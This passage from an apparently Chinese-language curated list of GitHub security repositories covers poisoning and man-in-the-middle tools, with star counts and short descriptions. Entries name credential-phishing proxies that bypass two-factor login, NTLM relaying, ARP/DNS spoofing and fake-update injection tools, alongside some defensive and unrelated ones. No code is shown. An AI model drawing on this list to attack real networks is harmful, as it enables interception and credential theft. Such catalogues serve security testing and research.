[samyk/poisontap](https://github.com/samyk/poisontap) Exploits locked/password protected computers over USB, drops persistent WebSocket-based backdoor, exposes internal router, and siphons cookies using Raspberry Pi Zero & Node.js. - [**767**ๆ˜Ÿ][5y] [Py] [shadowsocks/chinadns-python](https://github.com/shadowsocks/chinadns-python) Protect yourself against DNS poisoning in China. - [**106**ๆ˜Ÿ][1y] [Py] [5alt/ultrarelay](https://github.com/5alt/ultrarelay) poison and relay NTLM credentials - [**66**ๆ˜Ÿ][7m] [C] [hc0d3r/sshd-poison](https://github.com/hc0d3r/sshd-poison) a tool to get creds of pam based sshd authentication - [**44**ๆ˜Ÿ][4m] [Py] [bieberg0n/bjdns](https://github.com/bieberg0n/bjdns) A dns server which can protect yourself against DNS poisoning in China. / ๆŠ—ๆฑกๆŸ“ ๅธฆ็ผ“ๅญ˜็š„dnsๆœๅŠกๅ™จ - [**29**ๆ˜Ÿ][2y] [Py] [aarreedd/arp-defense](https://github.com/aarreedd/arp-defense) ARP Poisoning Defense Scripts - [**26**ๆ˜Ÿ][5y] [Py] [oros42/arp_poisoning_detector](https://github.com/oros42/arp_poisoning_detector) Simple detector of ARP poisoning attack - [**24**ๆ˜Ÿ][5m] [Go] [skeeto/pgp-poisoner](https://github.com/skeeto/pgp-poisoner) PGP key poisoner - [**22**ๆ˜Ÿ][6y] [C] [t00sh/elf-poison](https://github.com/t00sh/elf-poison) Proof Of Concept for inserting code in ELF binaries. - [**20**ๆ˜Ÿ][4m] [C] [en14c/erebus](https://github.com/en14c/erebus) Poc for ELF64 runtime infection via GOT poisoning technique by elfmaster - [**17**ๆ˜Ÿ][7y] [C] [m0nad/arp-poison](https://github.com/m0nad/arp-poison) arp-poison (aka arp spoof) tool - [**12**ๆ˜Ÿ][4y] [Perl] [mattiasgeniar/slowloris](https://github.com/mattiasgeniar/slowloris) Slowloris - the low bandwidth, yet greedy and poisonous HTTP client - [**8**ๆ˜Ÿ][4y] [Java] [mehiar/arp-poisoning-and-defend](https://github.com/mehiar/arp-poisoning-and-defend) - [**8**ๆ˜Ÿ][4y] [Go] [nkbai/arppoison](https://github.com/nkbai/arppoison) arp poison ๅฏไปฅ่ฟ›่กŒdnsๆฌบ้ช—๏ผŒๆต้‡ไน‹็ฑป็š„ๆ“ไฝœ - [**5**ๆ˜Ÿ][4y] [Ruby] [msiavashi/ada-arp-defense](https://github.com/msiavashi/ada-arp-defense) Ada is a very simple tool written in pure ruby and on top of packetfu to detect arp poisoned packets and defend you automatically from the attack while even find the attacker for you . - [**4**ๆ˜Ÿ][4m] [C] [srjanel/arp_poisoning](https://github.com/srjanel/arp_poisoning) Arp Poisoning tool in C using raw sockets - [**3**ๆ˜Ÿ][2y] [Py] [b2dfir/linuxpoisonablelogfinder](https://github.com/b2dfir/linuxpoisonablelogfinder) Security Testing Tool to identify whether a list of common log files, which may be used for log poisoning, can be accessed from an known local file inclusion vulnerability. - [**3**ๆ˜Ÿ][5m] [Py] [emreovunc/arp-poisoning-tool](https://github.com/emreovunc/arp-poisoning-tool) ARP Poisoning Tool - [**2**ๆ˜Ÿ][1y] [Py] [fishyyh/arppoison](https://github.com/fishyyh/arppoison) - [**1**ๆ˜Ÿ][3y] [C] [abapat/dnspoison](https://github.com/abapat/dnspoison) A DNS packet injection and poisoning detection utility - [**1**ๆ˜Ÿ][2y] [filipemgs/poisonjs](https://github.com/filipemgs/poisonjs) PoisonJS - De-obfuscate eval-based JavaScript obfuscation with monkey-patched eval(-like) functions. # <a id="42ae221f526f55b5282ea221a376ec6c"></a>ไธญ้—ดไบบ&&MITM *** ## <a id="42f9e068b6511bcbb47d6b2b273097da"></a>ๆœชๅˆ†็ฑป - [**6523**ๆ˜Ÿ][28d] [Go] [bettercap/bettercap](https://github.com/bettercap/bettercap) ๆ–ฐ็‰ˆ็š„bettercap, Go ็ผ–ๅ†™. bettercap ๆ˜ฏๅผบๅคง็š„ใ€ๆจกๅ—ๅŒ–ใ€ๅฏ็งปๆคไธ”ๆ˜“ไบŽๆ‰ฉๅฑ•็š„ MITM ๆก†ๆžถ, ๆ—ง็‰ˆ็”จ Ruby ็ผ–ๅ†™ - [**2989**ๆ˜Ÿ][5d] [JS] [evilsocket/pwnagotchi](https://github.com/evilsocket/pwnagotchi) ๆทฑๅบฆๅญฆไน +Bettercap๏ผŒๅŸบไบŽA2C๏ผŒไปŽๅ‘จๅ›ด็š„WiFi็Žฏๅขƒไธญๅญฆไน ๏ผŒไปฅๆœ€ๅคง็จ‹ๅบฆๅœฐๅˆฉ็”จๆ•่Žท็š„WPAๅ…ณ้”ฎไฟกๆฏ - [**2905**ๆ˜Ÿ][1y] [Py] [byt3bl33d3r/mitmf](https://github.com/byt3bl33d3r/mitmf) Framework for Man-In-The-Middle attacks - [**2829**ๆ˜Ÿ][2m] [Go] [kgretzky/evilginx2](https://github.com/kgretzky/evilginx2) ็‹ฌ็ซ‹็š„MITMๆ”ปๅ‡ปๅทฅๅ…ท๏ผŒ็”จไบŽ็™ปๅฝ•ๅ‡ญ่ฏ้’“้ฑผ๏ผŒๅฏ็ป•่ฟ‡ๅŒๅ› ็ด ่ฎค่ฏ - [**2551**ๆ˜Ÿ][2y] [evilsocket/bettercap](https://github.com/evilsocket/bettercap) ไธญ้—ดไบบๆ”ปๅ‡ปๆก†ๆžถ๏ผŒๅŠŸ่ƒฝๅฎŒๆ•ด๏ผŒๆจกๅ—ๅŒ–่ฎพ่ฎก๏ผŒ่ฝปไพฟไธ”ๆ˜“ไบŽๆ‰ฉๅฑ•ใ€‚ - [**1425**ๆ˜Ÿ][2m] [Py] [xdavidhu/mitmap](https://github.com/xdavidhu/mitmap) - [**1385**ๆ˜Ÿ][11d] [Go] [unrolled/secure](https://github.com/unrolled/secure) HTTP middleware for Go that facilitates some quick security wins. - [**1295**ๆ˜Ÿ][2y] [Go] [malfunkt/hyperfox](https://github.com/malfunkt/hyperfox) ๅœจๅฑ€ๅŸŸ็ฝ‘ไธŠไปฃ็†ๅ’Œ่ฎฐๅฝ• HTTP ๅ’Œ HTTPs ้€šไฟก - [**1204**ๆ˜Ÿ][4m] [C] [droe/sslsplit](https://github.com/droe/sslsplit) ้€ๆ˜ŽSSL/TLSๆ‹ฆๆˆช - [**1194**ๆ˜Ÿ][3m] [Py] [jtesta/ssh-mitm](https://github.com/jtesta/ssh-mitm) SSH ไธญ้—ดไบบๆ”ปๅ‡ปๅทฅๅ…ท - [**1101**ๆ˜Ÿ][8m] [Ruby] [lionsec/xerosploit](https://github.com/lionsec/xerosploit) Efficient and advanced man in the middle framework - [**1046**ๆ˜Ÿ][4m] [PS] [kevin-robertson/inveigh](https://github.com/kevin-robertson/inveigh) Windows PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer/man-in-the-middle tool - [**1008**ๆ˜Ÿ][2m] [Go] [justinas/nosurf](https://github.com/justinas/nosurf) CSRF protection middleware for Go. - [**985**ๆ˜Ÿ][1y] [HTML] [sensepost/mana](https://github.com/sensepost/mana) *DEPRECATED* mana toolkit for wifi rogue AP attacks and MitM - [**980**ๆ˜Ÿ][2m] [Py] [syss-research/seth](https://github.com/syss-research/seth) Perform a MitM attack and extract clear text credentials from RDP connections - [**949**ๆ˜Ÿ][2y] [Py] [arnaucube/coffeeminer](https://github.com/arnaucube/coffeeMiner) collaborative (mitm) cryptocurrency mining pool in wifi networks - [**845**ๆ˜Ÿ][1y] [Py] [kgretzky/evilginx](https://github.com/kgretzky/evilginx) man-in-the-middle attack framework used for phishing credentials and session cookies of any web service - [**596**ๆ˜Ÿ][9m] [Py] [fox-it/mitm6](https://github.com/fox-it/mitm6) exploits the default configuration of Windows to take over the default DNS server - [**582**ๆ˜Ÿ][12m] [HTML] [r00t-3xp10it/morpheus](https://github.com/r00t-3xp10it/morpheus) Morpheus - Automating Ettercap TCP/IP (MITM-hijacking Tool) - [**547**ๆ˜Ÿ][2y] [TS] [samdenty/injectify](https://github.com/samdenty/injectify) ๅฏน็ฝ‘็ซ™ๅฎž่กŒไธญ้—ดไบบๆ”ปๅ‡ป็š„ๆก†ๆžถ - [**522**ๆ˜Ÿ][4y] [C] [jondonym/peinjector](https://github.com/jondonym/peinjector) peinjector - MITM PE file infector - [**515**ๆ˜Ÿ][13d] [JS] [moll/node-mitm](https://github.com/moll/node-mitm) Intercept and mock outgoing Node.js network TCP connections and HTTP requests for testing. Intercepts and gives you a Net.Socket, Http.IncomingMessage and Http.ServerResponse to test and respond with. Super useful when testing code that hits remote servers. - [**473**ๆ˜Ÿ][3y] [CoffeeScript] [rastapasta/pokemon-go-mitm](https://github.com/rastapasta/pokemon-go-mitm) - [**443**ๆ˜Ÿ][23d] [TS] [shroudedcode/apk-mitm](https://github.com/shroudedcode/apk-mitm) - [**439**ๆ˜Ÿ][1y] [JS] [digitalsecurity/btlejuice](https://github.com/digitalsecurity/btlejuice) BtleJuice Bluetooth Smart (LE) Man-in-the-Middle framework - [**434**ๆ˜Ÿ][8y] [C++] [moxie0/sslsniff](https://github.com/moxie0/sslsniff) A tool for automated MITM attacks on SSL connections. - [**399**ๆ˜Ÿ][4m] [Go] [cloudflare/mitmengine](https://github.com/cloudflare/mitmengine) A MITM (monster-in-the-middle) detection tool. Used to build MALCOLM: - [**391**ๆ˜Ÿ][2y] [Py] [conorpp/btproxy](https://github.com/conorpp/btproxy) Man in the Middle analysis tool for Bluetooth. - [**391**ๆ˜Ÿ][1m] [JS] [joeferner/node-http-mitm-proxy](https://github.com/joeferner/node-http-mitm-proxy) HTTP Man In The Middle (MITM) Proxy - [**385**ๆ˜Ÿ][1y] [JS] [securing/gattacker](https://github.com/securing/gattacker) A Node.js package for BLE (Bluetooth Low Energy) security assessment using Man-in-the-Middle and other attacks - [**368**ๆ˜Ÿ][11m] [Py] [crypt0s/fakedns](https://github.com/crypt0s/fakedns) A regular-expression based python MITM DNS server with support for DNS Rebinding attacks - [**355**ๆ˜Ÿ][26d] [Py] [gosecure/pyrdp](https://github.com/gosecure/pyrdp) RDP man-in-the-middle (mitm) and library for Python 3 with the ability to watch connections live or after the fact - [**347**ๆ˜Ÿ][1y] [Py] [quickbreach/smbetray](https://github.com/quickbreach/smbetray) SMB MiTM tool with a focus on attacking clients through file content swapping, lnk swapping, as well as compromising any data passed over the wire in cleartext. - [**342**ๆ˜Ÿ][2y] [Shell] [brannondorsey/mitm-router](https://github.com/brannondorsey/mitm-router) mitm-router๏ผšๅฐ†ไปปไฝ•ไธ€ๅฐLinux ่ฎก็ฎ—ๆœบ่ฝฌๅ˜ๆˆๅ…ฌๅผ€็š„ Wi-Fi ็ฝ‘็ปœ๏ผŒๅนถไธ”้ป˜่ฎคMan-in-the-middle ๆ‰€ๆœ‰ http ๆต้‡ - [**296**ๆ˜Ÿ][1y] [Shell] [cryptolok/ghostinthenet](https://github.com/cryptolok/ghostinthenet) Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan - [**290**ๆ˜Ÿ][2y] [Py] [websploit/websploit](https://github.com/websploit/websploit) websploit is an advanced MITM framework - [**279**ๆ˜Ÿ][3y] [JS] [wuchangming/https-mitm-proxy-handbook](https://github.com/wuchangming/https-mitm-proxy-handbook) ๅŸบไบŽNode.js็š„HTTPS MITM(ไธญ้—ดไบบ)ไปฃ็†็š„ๅŽŸ็†ๅ’Œๅฎž็Žฐ - [**251**ๆ˜Ÿ][4m] [C#] [kevin-robertson/inveighzero](https://github.com/kevin-robertson/inveighzero) Windows C# LLMNR/mDNS/NBNS/DNS spoofer/man-in-the-middle tool - [**240**ๆ˜Ÿ][4y] [Py] [intrepidusgroup/mallory](https://github.com/intrepidusgroup/mallory) Mallory - MiTM TCP and UDP Proxy - [**236**ๆ˜Ÿ][4y] [Py] [withdk/badusb2-mitm-poc](https://github.com/withdk/badusb2-mitm-poc) BadUSB 2.0 USB-HID MiTM POC - [**229**ๆ˜Ÿ][9m] [Py] [ivanvza/arpy](https://github.com/ivanvza/arpy) Mac OSX ARP spoof (MiTM) tool that can also plug into Gource - [**228**ๆ˜Ÿ][19d] [sab0tag3d/mitm-cheatsheet](https://github.com/sab0tag3d/mitm-cheatsheet) All MITM attacks in one place. - [**188**ๆ˜Ÿ][3m] [Py] [internetarchive/warcprox](https://github.com/internetarchive/warcprox) WARC writing MITM HTTP/S proxy - [**181**ๆ˜Ÿ][3y] [Py] [ctxis/wsuspect-proxy](https://github.com/ctxis/wsuspect-proxy) WSUSpect Proxy - a tool for MITM'ing insecure WSUS connections - [**177**ๆ˜Ÿ][4y] [Shell] [floyd-fuh/tiny-mitm-proxy](https://github.com/floyd-fuh/tiny-mitm-proxy) Probably one of the smallest SSL MITM proxies you can make - [**175**ๆ˜Ÿ][3y] [Shell] [praetorian-code/mitm-vm](https://github.com/praetorian-code/mitm-vm) An easy-to-deploy virtual machine that can provide flexible man-in-the-middle capabilities. - [**171**ๆ˜Ÿ][3y] [HTML] [purpleteam/snarf](https://github.com/purpleteam/snarf) Snarf man-in-the-middle / relay suite - [**166**ๆ˜Ÿ][2m] [C] [elementsproject/secp256k1-zkp](https://github.com/elementsproject/secp256k1-zkp) Experimental fork of libsecp256k1 with support for pedersen commitments and range proofs. - [**161**ๆ˜Ÿ][3y] [Py] [pentesteres/delorean](https://github.com/pentesteres/delorean) NTP Main-in-the-Middle tool - [**148**ๆ˜Ÿ][5y] [Py] [mveytsman/dilettante](https://github.com/mveytsman/dilettante) Maven central doesn't do SSL when serving you JARs. Dilettante is a MiTM proxy for exploiting that. - [**146**ๆ˜Ÿ][2y] [Go] [magisterquis/sshhipot](https://github.com/magisterquis/sshhipot) High-interaction MitM SSH honeypot - [**137**ๆ˜Ÿ][29d] [Shell] [reb311ion/tornado](https://github.com/reb311ion/tornado) All in one MITM tool . - [**134**ๆ˜Ÿ][19d] [Py] [certcc/tapioca](https://github.com/certcc/tapioca) CERT Tapioca for MITM network analysis - [**128**ๆ˜Ÿ][4y] [Py] [andrewhilts/snifflab](https://github.com/andrewhilts/snifflab) Scripts to create your own MITM'ing, packet sniffing WiFi access point - [**118**ๆ˜Ÿ][1y] [Py] [amossys/memitm](https://github.com/amossys/memitm) Tool to make in memory man in the middle - [**113**ๆ˜Ÿ][2y] [Shell] [pimps/wsuxploit](https://github.com/pimps/wsuxploit) wsuxploit๏ผšMiTM ๆผๆดžๅˆฉ็”จ่„šๆœฌ๏ผŒ็”จไบŽๅฐ†โ€œๅ‡ๅ†’โ€ๆ›ดๆ–ฐๆณจๅ…ฅๅˆฐ้ž SSL WSUS ๆต้‡ไธญ - [**112**ๆ˜Ÿ][3y] [Py] [codepr/creak](https://github.com/codepr/creak) Poison, reset, spoof, redirect MITM script - [**95**ๆ˜Ÿ][3y] [JS] [compewter/copycat](https://github.com/compewter/copycat) Universal MITM web server - [**87**ๆ˜Ÿ][8m] [Shell] [1n3/prism-ap](https://github.com/1n3/prism-ap) An automated Wireless RogueAP MITM attack framework. - [**85**ๆ˜Ÿ][4y] [Py] [liuhui0613/thewind](https://github.com/liuhui0613/thewind) a MITM attack tool - [**82**ๆ˜Ÿ][6m] [Ruby] [argos83/ritm](https://github.com/argos83/ritm) Ruby In The Middle (HTTP/HTTPS interception proxy) - [**77**ๆ˜Ÿ][4y] [CoffeeScript] [olegberman/mitm-omegle](https://github.com/olegberman/mitm-omegle) Watch strangers talk on Omegle (man in the middle attack) - [**76**ๆ˜Ÿ][6y] [Shell] [neohapsis/suddensix](https://github.com/neohapsis/suddensix) IPV6 MITM attack tool - [**69**ๆ˜Ÿ][2y] [Haskell] [adjoint-io/pedersen-commitment](https://github.com/adjoint-io/pedersen-commitment) Cryptographic Commitment Schemes - [**66**ๆ˜Ÿ][4y] [JS] [etherdream/mitm-http-cache-poisoning](https://github.com/etherdream/mitm-http-cache-poisoning) HTTP Cache Poisoning Demo - [**58**ๆ˜Ÿ][3y] [Shell] [r00t-3xp10it/netool-toolkit](https://github.com/r00t-3xp10it/netool-toolkit) MitM pentesting opensource toolkit (scan/sniff/exploit) -- NOT SUPORTED ANYMORE -- - [**55**ๆ˜Ÿ][2y] [C++] [caseysmithrc/memmitm](https://github.com/caseysmithrc/memmitm) SSL In Memory Inspection - Proof Of Concept. - [**52**ๆ˜Ÿ][3y] [Py] [cylance/mitmcanary](https://github.com/cylance/mitmcanary) Tool/service to detect Man in the Middle attacks with Canary Requests - [**51**ๆ˜Ÿ][1y] [Go] [mrexodia/haxxmap](https://github.com/mrexodia/haxxmap) Some simple go tools to perform a Man-in-the-middle (MITM) attack on your IMAP server in case you forgot your password. - [**48**ๆ˜Ÿ][2y] [PS] [clr2of8/detect-sslmitm](https://github.com/clr2of8/detect-sslmitm) This PowerShell script will determine if your connection to external servers over HTTPS is being decrypted by an intercepting proxy such as the internet proxies commonly found in corporate environments. It does this by comparing the SSL intermediate certificate being used for your connection to the true/known SSL certificate for the server. - [**47**ๆ˜Ÿ][4y] [C++] [mozmark/ringleader](https://github.com/mozmark/ringleader) A tool for configuring and using MITM proxies from firefox - [**47**ๆ˜Ÿ][10m] [Py] [lorenzb/libsubmarine](https://github.com/lorenzb/libsubmarine) Implementation of a novel practical scheme for submarine commitments - [**42**ๆ˜Ÿ][5y] [Py] [husam212/mitmer](https://github.com/husam212/mitmer) Automated man-in-the-middle attack tool. - [**42**ๆ˜Ÿ][1y] [C#] [advancedhacker101/c-sharp-proxy-server](https://github.com/advancedhacker101/c-sharp-proxy-server) A proxy server built with c# can be both normal and MITM Proxy - [**40**ๆ˜Ÿ][6y] [Py] [ipopov/starttls-mitm](https://github.com/ipopov/starttls-mitm) A starttls-capable transparent man-in-the-middle proxy - [**38**ๆ˜Ÿ][2y] [Py] [m4n3dw0lf/sslkill](https://github.com/m4n3dw0lf/sslkill) Forced Man-In-The-Middle HTTPs-Avoiding Reverse Proxy - [**38**ๆ˜Ÿ][7m] [Java] [hsiafan/cute-proxy](https://github.com/hsiafan/cute-proxy) A Man-In-The-Middle Proxy as Fiddle and Charles, using Netty, JavaFX - [**36**ๆ˜Ÿ][3y] [JS] [jackgu1988/dsploit-scripts](https://github.com/jackgu1988/dsploit-scripts) Scripts that could be injected in MITM attacks using dSploit - [**35**ๆ˜Ÿ][7d] [Rust] [scipr-lab/poly-commit](https://github.com/scipr-lab/poly-commit) A Rust library for polynomial commitments - [**33**ๆ˜Ÿ][5d] [Py] [kevcui/mitm-scripts](https://github.com/kevcui/mitm-scripts) - [**33**ๆ˜Ÿ][3y] [Py] [syss-research/dns-mitm](https://github.com/syss-research/dns-mitm) A minimal DNS service that can provide spoofed replies - [**32**ๆ˜Ÿ][5y] [Perl] [linvex/mitm-squid](https://github.com/linvex/mitm-squid) sharing some files of MITM-squid attack. - [**31**ๆ˜Ÿ][26d] [Ruby] [gplcc/gplcc](https://github.com/gplcc/gplcc) GPL Cooperation Commitment - [**31**ๆ˜Ÿ][1y] [Py] [thusoy/postgres-mitm](https://github.com/thusoy/postgres-mitm) Test whether your Postgres connections are vulnerable to MitM attacks - [**30**ๆ˜Ÿ][8y] [Py] [hubert3/isniff](https://github.com/hubert3/isniff) SSL man-in-the-middle tool targeting iOS devices < 4.3.5 - [**29**ๆ˜Ÿ][5y] [C] [conorpp/mitm-http-proxy](https://github.com/conorpp/mitm-http-proxy) A simple, low level http/https proxy server with MiTM pranking features. - [**29**ๆ˜Ÿ][2m] [JS] [dangkyokhoang/man-in-the-middle](https://github.com/dangkyokhoang/man-in-the-middle) Modify requests, inject JavaScript and CSS into pages - [**28**ๆ˜Ÿ][3y] [Java] [elynx/pokemon-go-xposed-mitm](https://github.com/elynx/pokemon-go-xposed-mitm) MITM attack on Pokemon Go (c) via XPosed framework - [**28**ๆ˜Ÿ][3y] [Py] [mvondracek/wifimitm](https://github.com/mvondracek/wifimitm) Automation of MitM Attack on Wi-Fi Networks - [**26**ๆ˜Ÿ][4y] [C] [gregwar/mitm](https://github.com/gregwar/mitm) Man in the middle tool - [**25**ๆ˜Ÿ][2y] [Py] [the404hacking/websploit](https://github.com/the404hacking/websploit) Websploit is an advanced MITM framework. - [**24**ๆ˜Ÿ][7y] [Java] [akdeniz/mitmsocks4j](https://github.com/akdeniz/mitmsocks4j) SOCKSไปฃ็†ๅ่ฎฎ็š„ๆ‹ฆๆˆชๅ™จ๏ผŒๅฏไปฅ่ฝฌๅ‚จไปปไฝ•่ฟžๆŽฅ็š„ๅ†…ๅฎน๏ผŒๅณไพฟๆœ‰SSL่ฟ›่กŒไฟๆŠค - [**24**ๆ˜Ÿ][2m] [TS] [dialogs/electron-ssl-pinning](https://github.com/dialogs/electron-ssl-pinning) Prevents MITM in Electron applications - [**24**ๆ˜Ÿ][11m] [Nim] [imgp3dev/drmitm](https://github.com/imgp3dev/drmitm) DrMITM is a program designed to globally log all traffic of a website. - [**23**ๆ˜Ÿ][8y] [C#] [sensepost/suru](https://github.com/sensepost/suru) Suru is one of the original Man In The Middle (MITM) proxies that sits between the user's browser and the web application. - [**22**ๆ˜Ÿ][2m] [Py] [lockgit/py](https://github.com/lockgit/py) rsa,base64,ac,kmp,svm,knn,mitm,hash table... - [**21**ๆ˜Ÿ][4y] [Shell] [psrcek/kali-mitm-evil-twin](https://github.com/psrcek/kali-mitm-evil-twin) A script that creates a wifi hotspot on kali linux that can view usernames and passwords of ssl logins. - [**19**ๆ˜Ÿ][2y] [Py] [jakev/mitm-helper-wifi](https://github.com/jakev/mitm-helper-wifi) WiFi MITM Helper - [**17**ๆ˜Ÿ][2y] [Py] [shramos/winregmitm](https://github.com/shramos/winregmitm) Perform MiTM attack and remove encryption on Windows Remote Registry Protocol. - [**16**ๆ˜Ÿ][7m] [Java] [aquazus/d1proxy](https://github.com/aquazus/d1proxy) A simple yet powerful Java 11 TCP MITM proxy for Dofus 1.29.1 - [**15**ๆ˜Ÿ][7y] [Ruby] [yakindanegitim/mbfuzzer](https://github.com/yakindanegitim/mbfuzzer) Mobile Application Fuzzer via SSL MITM - [**14**ๆ˜Ÿ][6m] [Rust] [nlevitt/monie](https://github.com/nlevitt/monie) man-in-the-middle http/https proxy library in rust - [**12**ๆ˜Ÿ][1y] [Go] [syncsynchalt/dime-a-tap](https://github.com/syncsynchalt/dime-a-tap) Man-in-the-middle TLS intercept proxy with tcpdumpable loopback - [**12**ๆ˜Ÿ][2y] [C++] [wakbox/wakxy](https://github.com/wakbox/wakxy) Wakxy is a Wakfu packet sniffer (MITM). Written in C++/Qt with Javascript scripting support. - [**12**ๆ˜Ÿ][9m] [C++] [spx01/switch-nfp-mitm](https://github.com/spx01/switch-nfp-mitm) Man-in-the-middle the Nintendo Switch's nfp:user service to spoof Amiibos. - [**11**ๆ˜Ÿ][11m] [Py] [nametoolong/oregano](https://github.com/nametoolong/oregano) Man-in-the-middle against Tor bridges - [**10**ๆ˜Ÿ][6m] [HTML] [chinarulezzz/refluxion](https://github.com/chinarulezzz/refluxion) Refluxion -- MITM WPA attacks tool - [**10**ๆ˜Ÿ][11m] [Py] [daniel4x/mitm-python](https://github.com/daniel4x/mitm-python) A simple as possible man in the middle written in python using scapy - ้‡ๅคๅŒบๆฎต: [ๅทฅๅ…ท->Scapy](#01f99d208e245eb44f15f720043b50d4) | - [**9**ๆ˜Ÿ][5m] [Py] [skyplabs/scapy-mitm](https://github.com/skyplabs/scapy-mitm) ARP cache poisoning implementation using Scapy - ้‡ๅคๅŒบๆฎต: [ๅทฅๅ…ท->Scapy](#01f99d208e245eb44f15f720043b50d4) | - [**9**ๆ˜Ÿ][4y] [8tiqa/vpn-security-analysis](https://github.com/8tiqa/vpn-security-analysis) Investigation of the core VPN technologies | Penetration testing of an IPsec-VPN (using Ike-scan and psk-crack) | MitM Attack on PPTP-VPN (using ARPspoof, chap2asleap, CUPP2 and ASLEAP) | In-depth research of IPv6 Leakage and DNS Hijacking i - [**8**ๆ˜Ÿ][3y] [johnmccabe/mitmweb-docker](https://github.com/johnmccabe/mitmweb-docker) Docker image for the mitmproxy web interface mitmweb - [**8**ๆ˜Ÿ][1m] [Go] [adguardteam/gomitmproxy](https://github.com/adguardteam/gomitmproxy) Simple golang mitm proxy implementation - [**7**ๆ˜Ÿ][1y] [Py] [mathewmarcus/stoptls](https://github.com/mathewmarcus/stoptls) MitM proxy which performs opportunistic SSL/TLS stripping - [**7**ๆ˜Ÿ][2y] [C++] [pfussell/pivotal](https://github.com/pfussell/pivotal) A MITM proxy server for reflective DLL injection through WinINet - [**7**ๆ˜Ÿ][2y] [socprime/muddywater-apt](https://github.com/socprime/muddywater-apt) MuddyWater is an APT group that has been active throughout 2017, targeting victims in Middle East with in-memory vectors leveraging on Powershell, in a family of attacks now identified as โ€œLiving off the landโ€, as they donโ€™t require the creation of new binaries on the victimโ€™s machine, thus maintaining a low detection profile and a low forensic footprint. The name MuddyWater has been assigned by PaloAlto in an article that describes how the actorโ€™s backdoor, called POWERSTATS, evolved over the past year. For the sake of clarity we decided to maintain the same names. The operators behind MuddyWater are likely espionage motivated, we derive this information from the analysis of data and backdoors behaviors. We also find that despite the strong preponderance of victims from Pakistan, the most active targets appear to be in: Saudi Arabia, UAE and Iraq. Amongst the victims we identify a variety of entities with a stronger focus at Governments, Telcos and Oil companies. - [**7**ๆ˜Ÿ][1m] [Py] [th3hurrican3/mitm](https://github.com/th3hurrican3/mitm) A simple yet effective python3 script to perform DNS spoofing via ARP poisoning - [**6**ๆ˜Ÿ][2y] [Java] [arvahedi/gl4dius](https://github.com/arvahedi/gl4dius) A very powerful tool for All kind of MITM attacks - [**6**ๆ˜Ÿ][10m] [JS] [cutenode/mitm.cool](https://github.com/cutenode/mitm.cool) source code for mitm.cool, a dead-simple site that doesn't have SSL... allowing public WiFi to MITM the request and get you authenticated - [**6**ๆ˜Ÿ][2y] [Go] [pulkitsharma07/proxybench](https://github.com/pulkitsharma07/proxybench) Benchmark different man-in-the-middle proxies - [**6**ๆ˜Ÿ][5y] [Shell] [mrmugiwara/airbase-ng-sslstrip-airstrip-](https://github.com/mrmugiwara/airbase-ng-sslstrip-airstrip-) While documenting some MitM attacks I was looking into setting up a fake AP with BT5 and my good old loved ALFA . There's a whole bunch of scripts out there which do the job nicely, if you are ready to modify them here and there. In order for it to work, you need to run airmon-ng to start the card in monitor mode, run airbase-ng to run it in AP โ€ฆ - [**5**ๆ˜Ÿ][4y] [Py] [0x8008135/pymitm6](https://github.com/0x8008135/pymitm6) - [**5**ๆ˜Ÿ][18d] [JS] [hotstu/open-slim-mock](https://github.com/hotstu/open-slim-mock) A lightweight & flexible nodejs powered web server for mock testing & MITM reverse proxy ไธ€ๆฌพๅŸบไบŽnodejs็š„ๆœๅŠก็ซฏ็จ‹ๅบ๏ผŒ็”จไบŽๅœจapp็š„ๅผ€ๅ‘่ฐƒ่ฏ•้˜ถๆฎตๆ›ดๅฅฝ็š„ไธŽๅŽ็ซฏไบบๅ‘˜ๅไฝœ๏ผŒไพฟไบŽๅ‰ๅŽ็ซฏๅˆ†็ฆป๏ผŒๅฟซ้€ŸๅฎšไฝๆŽฅๅฃ้—ฎ้ข˜ - [**5**ๆ˜Ÿ][1y] [TS] [pogosandbox/node-pogo-mitm](https://github.com/pogosandbox/node-pogo-mitm) - [**5**ๆ˜Ÿ][2y] [C++] [xiaxiaoyu1988/smitm](https://github.com/xiaxiaoyu1988/smitm) A http and https mitm tool - [**4**ๆ˜Ÿ][2y] [Py] [gteissier/cve-2016-6271](https://github.com/gteissier/cve-2016-6271) Proof of concept for ZRTP man-in-the-middle - [**4**ๆ˜Ÿ][1y] [Py] [mh4x0f/kinproxy](https://github.com/mh4x0f/kinproxy) my implements transparent proxies (mitmproxy) can use to intercept and manipulate HTTP traffic modifying requests and responses. CLI - [**4**ๆ˜Ÿ][2y] [C++] [robertblackwell/marvincpp](https://github.com/robertblackwell/marvincpp) a C++ version of the man-in-the-middle proxy based around BOOST/ASIO's async IO model - [**4**ๆ˜Ÿ][1y] [Py] [tanc7/facerider](https://github.com/tanc7/facerider) New and improved Man-In-The-Middle Framework fixes for Nethunter Phones and Tablets - [**4**ๆ˜Ÿ][6y] [wshen0123/mitm-rogue-wifi-ap](https://github.com/wshen0123/mitm-rogue-wifi-ap) MITM Attack Example Code with Rogue Wi-Fi AP - [**3**ๆ˜Ÿ][5y] [Perl] [em616/juli](https://github.com/em616/juli) A simple automated perl script for MiTM ( man-in-the-middle ) attacks. - [**2**ๆ˜Ÿ][2y] [Py] [alvarogzp/man-in-the-middle](https://github.com/alvarogzp/man-in-the-middle) Python library implementing a network proxy with the ability to modify stream data - [**2**ๆ˜Ÿ][3y] [Go] [andream16/gocrackerino](https://github.com/andream16/gocrackerino) Go Meet in The Middle Key Cracker - [**2**ๆ˜Ÿ][1y] [Shell] [apacketofsweets/buttertrace](https://github.com/apacketofsweets/buttertrace) A wrapper that combines the use of arpspoof & tcpdump in order to perform MITM traffic interception - [**2**ๆ˜Ÿ][8y] [Py] [crapworks/nervensaege](https://github.com/crapworks/nervensaege) SSL MitM Proxy for attacking online banking transactions - [**2**ๆ˜Ÿ][2m] [Py] [danngalann/arpdos](https://github.com/danngalann/arpdos) A python script to DoS / MITM every device on the network (except yourself ;)) - [**2**ๆ˜Ÿ][3y] [Py] [gosecure/wsuspect-proxy](https://github.com/gosecure/wsuspect-proxy) WSUSpect Proxy - a tool for MITM'ing insecure WSUS connections - [**2**ๆ˜Ÿ][4y] [C#] [hotallday/xat-mitm](https://github.com/hotallday/xat-mitm) Man in the middle attack on xat chats - [**2**ๆ˜Ÿ][6y] [Py] [koto/exceed-mitm](https://github.com/koto/exceed-mitm) Exceed OnDemand MITM proof-of-concept - [**2**ๆ˜Ÿ][2m] [Py] [nametoolong/mesona](https://github.com/nametoolong/mesona) MITM proxy with GnuTLS's record length hiding - [**2**ๆ˜Ÿ][2y] [Swift] 